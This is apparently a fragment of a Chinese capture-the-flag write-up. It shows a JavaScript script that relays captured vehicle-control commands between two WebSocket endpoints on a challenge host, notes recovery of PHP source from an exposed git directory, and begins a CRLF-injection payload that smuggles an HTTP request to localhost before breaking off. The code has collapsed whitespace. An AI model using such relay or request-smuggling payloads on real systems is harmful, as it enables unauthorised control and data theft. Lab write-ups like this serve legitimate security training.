1. Webbest_agent这个页面的操作会把车辆操作的命令发送的/test/log写个脚本不断获取到指令并且发送到hack/controltype="text/javascript">varws1,ws2;ws2=newWebSocket("ws://47.93.2.254:36077/test/log");ws1=newWebSocket("ws://47.93.2.254:36077/hack/control");ws1.onopen=function(){ws2.onmessage=function (event){console.log(event['data']);ws1.send(event['data']);ws1.send(event['data'].replace("\n", ""));};}ws1.onmessage=function(e){console.log(e);} 根据提示跑完全程,提示一个HTTP代理一开始就怀疑CRLF注入后面提示了,正好直接打了,扫目录出来一个git,还原得到源码:php$input=file_get_contents("php://input");$obj=json_decode($input);if ($obj->get_flag_is_a_beautiful_thing=="yes") { $FLAG=file_get_contents("/flag"); file_put_contents('flag', $FLAG);} 根据题目提示直接构造CRLF注入,构造脚本如下:php$payload=urlencode("open.php HTTP/1.1\r\nHost: 127.0.0.1:8000\r\nContent-Length: 41\r\n
………………………………